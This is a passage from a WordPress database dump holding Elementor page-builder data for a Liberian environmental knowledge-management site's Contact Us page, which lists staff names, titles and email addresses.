"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14933,2371,'_elementor_edit_mode','builder'),(14934,2371,'_elementor_template_type','wp-page'),(14935,2371,'_elementor_version','2.7.5'),(14936,2371,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (14937,2371,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14940,2372,'_elementor_edit_mode','builder'),(14941,2372,'_elementor_template_type','wp-page'),(14942,2372,'_elementor_version','2.7.5'),(14943,2372,'_wp_page_template','default'),(14944,2372,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet